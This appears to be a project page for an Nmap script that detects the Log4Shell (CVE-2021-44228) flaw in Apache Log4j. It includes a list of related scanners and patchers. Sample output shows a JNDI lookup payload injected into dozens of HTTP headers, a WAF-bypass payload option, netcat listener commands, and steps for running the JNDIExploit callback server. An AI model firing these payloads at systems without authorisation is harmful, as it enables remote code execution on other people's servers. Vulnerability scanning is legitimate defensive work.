giterlizzi / nmap-log4shell

Licence: MIT license
Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)

Programming language: Lua

Projects that are alternatives of or similar to nmap-log4shell

log4jscanwin
Log4j Vulnerability Scanner for Windows
Stars: ✭ 142 (+162.96%)
Mutual labels:  log4j, vulnerability, cve-2021-44228, log4shell
log4shell-finder
Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-2019-17571, CVE-2022-23305, CVE-2022-23307 ... ) instances of log4j library. Excellent performance and low memory footprint.
Stars: ✭ 22 (-59.26%)
Mutual labels:  log4j, vulnerability, cve-2021-44228, log4shell
log4shelldetect
Rapidly scan filesystems for Java programs potentially vulnerable to Log4Shell (CVE-2021-44228) or "that Log4j JNDI exploit" by inspecting the class paths inside files
Stars: ✭ 40 (-25.93%)
Mutual labels:  log4j, cve-2021-44228, log4shell
NSE-scripts
NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972, proxyshell, CVE-2021-34473
Stars: ✭ 105 (+94.44%)
Mutual labels:  nmap, vulnerability, nmap-scripts
Vulscan
Advanced vulnerability scanning with Nmap NSE
Stars: ✭ 2,305 (+4168.52%)
Mutual labels:  nmap, vulnerability, nmap-scripts
log4j-cve-2021-44228
Ansible detector scanner playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 Remote Code Execution - log4j (CVE-2021-44228)
Stars: ✭ 58 (+7.41%)
Mutual labels:  log4j, cve-2021-44228, log4shell
Log4j-RCE-Scanner
Remote command execution vulnerability scanner for Log4j.
Stars: ✭ 200 (+270.37%)
Mutual labels:  log4j, cve-2021-44228, log4shell
HackLog4j
HackLog4j: The Eternal Evil Dragon. A tribute to the most invincible Java logging library in the universe!
Stars: ✭ 161 (+198.15%)
Mutual labels:  log4j, cve-2021-44228, log4shell
awesome-log4shell
An Awesome List of Log4Shell resources to help you stay informed and secure! 🔒
Stars: ✭ 194 (+259.26%)
Mutual labels:  log4j, vulnerability, log4shell
Log4jPatcher
A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)
Stars: ✭ 43 (-20.37%)
Mutual labels:  log4j, cve-2021-44228, log4shell
safelog4j
Safelog4j is an instrumentation-based security tool to help teams discover, verify, and solve log4shell vulnerabilities without scanning or upgrading
Stars: ✭ 38 (-29.63%)
Mutual labels:  log4j, vulnerability, log4shell
log4jshield
Log4j Shield - fast ⚡, scalable and easy to use Log4j vulnerability CVE-2021-44228 finder and patcher
Stars: ✭ 13 (-75.93%)
Mutual labels:  log4j, cve-2021-44228, log4shell
log4shell-tools
Tool that runs a test to check whether one of your applications is affected by the recent vulnerabilities in log4j: CVE-2021-44228 and CVE-2021-45046
Stars: ✭ 55 (+1.85%)
Mutual labels:  log4j, cve-2021-44228, log4shell
cloudrasp-log4j2
A Runtime Application Self-Protection (RASP) module specifically designed for log4j2 RCE (CVE-2021-44228) defense.
Stars: ✭ 105 (+94.44%)
Mutual labels:  log4j, vulnerability, cve-2021-44228
log4j-detector
Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!
Stars: ✭ 622 (+1051.85%)
Mutual labels:  log4j, cve-2021-44228, log4shell
log4jpwn
log4j rce test environment and poc
Stars: ✭ 306 (+466.67%)
Mutual labels:  log4j, cve-2021-44228, log4shell
log4j-scanner
log4j-scanner is a project derived from other members of the open-source community by CISA to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.
Stars: ✭ 1,212 (+2144.44%)
Mutual labels:  log4j, cve-2021-44228
log4j-sniffer
A tool that scans archives to check for vulnerable log4j versions
Stars: ✭ 180 (+233.33%)
Mutual labels:  log4j, cve-2021-44228
CVE-2021-44228-PoC-log4j-bypass-words
🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks
Stars: ✭ 760 (+1307.41%)
Mutual labels:  log4j, cve-2021-44228
awesome-list-of-secrets-in-environment-variables
🦄🔒 Awesome list of secrets in environment variables 🖥️
Stars: ✭ 538 (+896.3%)
Mutual labels:  log4j, cve-2021-44228

Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)

nmap-log4shell is an NSE script for discovering the Apache Log4j RCE vulnerability (CVE-2021-44228) across the network. The script can inject the log4shell exploit payload via HTTP headers (default) or via a TCP/UDP socket.

Vulnerability

CVE-2021-44228 is a remote code execution (RCE) vulnerability in Apache Log4j 2. An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of log4j. The crafted request uses a Java Naming and Directory Interface (JNDI) injection via a variety of services including:

  • Lightweight Directory Access Protocol (LDAP)
  • Secure LDAP (LDAPS)
  • Remote Method Invocation (RMI)
  • Domain Name Service (DNS)

If the vulnerable server uses log4j to log requests, the exploit will then request a malicious payload over JNDI through one of the services above from an attacker-controlled server. Successful exploitation could lead to RCE.

Installation

Find the directory where the Nmap scripts are stored on your system:

  • for *nix system it might be ~/.nmap/scripts/ or $NMAPDIR
  • for Mac it might be /usr/local/Cellar/nmap/<version>/share/nmap/scripts/
  • for Windows it might be C:\Program Files (x86)\Nmap\scripts

Copy the provided script (log4shell.nse) into that directory, then run nmap --script-updatedb to update the Nmap script database.

Usage

nmap --script log4shell.nse --script-args log4shell.callback-server=172.17.42.1:1389 -p 8080 172.17.42.2 
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 21:26 CET
Nmap scan report for 172.17.42.1
Host is up (0.000096s latency).

PORT     STATE SERVICE
8080/tcp open  http-proxy
| log4shell: 
|   Payloads:
|     ${jndi:ldap:/172.17.42.1:389/log4shell}
|   Test Method: HTTP
|   URL Path: /
|   HTTP Method: GET
|   HTTP Headers: 
|     Access-Control-Request-Method: 200 
|     Accept: 200 
|     Access-Control-Request-Headers: 200 
|     Accept-Charset: 200 
|     X-Api-Version: 200 
|     Warning: 200 
|     Pragma: 200 
|     Upgrade-Insecure-Requests: 200 
|     Range,: 400 
|     Hostname: 200 
|     Content-Length: 400 
|     Dnt: 200 
|     Date: 200 
|     Username: 200 
|     Content-Encoding: 200 
|     Content-Type: 200 
|     Forwarded: 200 
|     Max-Forwards: 200 
|     Accept-Encoding: 200 
|     Referer: 200 
|     IP: 200 
|     IPaddress: 200 
|     X-Amz-Date: 200 
|     X-Amz-Target: 200 
|     TE: 200 
|     Content-Disposition: 200 
|     X-Requested-With: 200 
|     upgrade-insecure-requests: 200 
|     Authorization: 200 
|     Cookie: 200 
|     User-Agent: 200 
|     Accept-Language: 200 
|     Proxy-Authorization: 200 
|     Expect: 417 
|     From: 200 
|     Accept-Datetime: 200 
|     X-CSRF-Token: 200 
|     Origin: 200 
|_  Note: (!) Inspect the callback server (172.17.42.1:389) or web-application (172.17.42.2:8080) logs
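
The note that closes the scan output asks for the web-application logs to be inspected. The following Python script is an added example, not part of nmap-log4shell: it searches an access log for JNDI lookup strings that use the services listed in the Vulnerability section and reports which callback endpoint each client supplied. The log lines are constructed (combined log format is an assumption), the function names are hypothetical, and only the literal ${jndi:...} form shown in the output above is matched.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# JNDI lookup using one of the services listed in the Vulnerability section.
# One or two slashes are accepted after the scheme because the payload printed
# in the scan output above uses a single slash.
JNDI_RE = re.compile(
    r'\$\{jndi:(?P<scheme>ldaps?|rmi|dns):/{1,2}'
    r'(?P<endpoint>[^/}\s"]+)(?P<path>/[^}\s"]*)?\}',
    re.IGNORECASE,
)

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = """\
172.17.42.1 - - [13/Dec/2021:21:26:03 +0100] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap:/172.17.42.1:389/log4shell}"
172.17.42.1 - - [13/Dec/2021:21:26:03 +0100] "GET / HTTP/1.1" 200 512 "${jndi:ldap:/172.17.42.1:389/log4shell}" "Mozilla/5.0"
10.0.0.7 - - [13/Dec/2021:21:30:10 +0100] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F192.0.2.10%3A1099%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"
10.0.0.8 - - [13/Dec/2021:21:31:00 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

def find_jndi_lookups(log_text):
    """Return one record per JNDI lookup string found in the log."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        client = line.split(" ", 1)[0]
        # Percent-decode so lookups carried in the query string are seen too.
        for m in JNDI_RE.finditer(unquote(line)):
            hits.append({"line": lineno, "client": client,
                         "scheme": m.group("scheme").lower(),
                         "endpoint": m.group("endpoint")})
    return hits

def callbacks_by_client(hits):
    """Group the callback endpoints that each client asked the server to contact."""
    grouped = defaultdict(set)
    for h in hits:
        grouped[h["client"]].add(f'{h["scheme"]}://{h["endpoint"]}')
    return {client: sorted(eps) for client, eps in grouped.items()}

if __name__ == "__main__":
    found = callbacks_by_client(find_jndi_lookups(SAMPLE_LOG))
    for client, endpoints in found.items():
        print(client, "->", ", ".join(endpoints))
```

A client that is not your own scanner and an endpoint that is not your own callback server both mark a request to follow up.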

Arguments

  • log4shell.callback-server: The callback server (eg. 172.17.42.1:1389)
  • log4shell.http-headers: Comma-separated list of HTTP headers (eg. X-Api-Version,User-Agent,Referer)
  • log4shell.http-method: HTTP method (default: GET)
  • log4shell.url-path: URL path (default: /)
  • log4shell.waf-bypass: Use WAF bypass payloads (default: false)
  • log4shell.test-method: Test through http (default), tcp, udp or all

Callback Server

The script relies on callbacks from the target being scanned and hence any firewall rules or interaction with other security devices will affect the efficacy of the script.

Netcat or Ncat

Listen on a TCP port with netcat (or ncat):

ncat -vkl 1389   # Ncat
nc -lvnp 1389    # Netcat

Run Nmap with the log4shell.nse script:

nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p <port>] <target>

See the target IP address in netcat (or ncat) output:

Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:38898.
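
When several hosts are scanned against one listener, the connection lines have to be matched back to the targets. The following Python script is an added example, not part of nmap-log4shell: it parses Ncat's "Connection from" lines in the format shown above and separates scanned targets that called back from sources outside the scan list (for example a target behind NAT). The sample output, target list and function names are constructed for illustration.

```python
import ipaddress
import re

# ncat -v prints two lines per connection; only the second carries the port,
# so only that one is counted.
NCAT_RE = re.compile(
    r"^Ncat: Connection from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<port>\d+))?\.$")

# Constructed listener output in the format shown above.
SAMPLE_NCAT = """\
Ncat: Listening on 0.0.0.0:1389
Ncat: Connection from 172.17.42.2.
Ncat: Connection from 172.17.42.2:38898.
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:40112.
Ncat: Connection from 172.17.42.2.
Ncat: Connection from 172.17.42.2:38910.
"""

def parse_callbacks(ncat_output):
    """Count connections per source IP from `ncat -vkl` output."""
    counts = {}
    for line in ncat_output.splitlines():
        m = NCAT_RE.match(line.strip())
        if m and m.group("port"):
            counts[m.group("ip")] = counts.get(m.group("ip"), 0) + 1
    return counts

def correlate(scanned, callbacks):
    """Split callback sources into scanned targets and unexpected sources.

    `scanned` holds the IPs or CIDR ranges that were passed to nmap.
    """
    nets = [ipaddress.ip_network(t, strict=False) for t in scanned]
    called_back, unexpected = {}, {}
    for ip, n in callbacks.items():
        inside = any(ipaddress.ip_address(ip) in net for net in nets)
        (called_back if inside else unexpected)[ip] = n
    silent = [t for t, net in zip(scanned, nets)
              if not any(ipaddress.ip_address(ip) in net for ip in called_back)]
    return {"called_back": called_back, "unexpected": unexpected, "silent": silent}

if __name__ == "__main__":
    print(correlate(["172.17.42.2", "172.17.42.3"], parse_callbacks(SAMPLE_NCAT)))
```

A target listed under "silent" is not shown to be unaffected: as stated above, firewall rules between the target and the callback server stop the callback from arriving.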

JNDIExploit

Download JNDIExploit from GitHub (https://github.com/giterlizzi/JNDIExploit/releases/download/v1.2/JNDIExploit.zip)

Start JNDIExploit server:

java -jar JNDIExploit.jar

Run Nmap with the log4shell.nse script:

nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p <port>] <target>

Check the JNDIExploit output for the received LDAP query:

[+] Received LDAP Query: log4shell
[!] Invalid LDAP Query: log4shell

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of nmap-log4shell for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

The project is licensed under MIT License.

Author

  • Giuseppe Di Terlizzi (giterlizzi)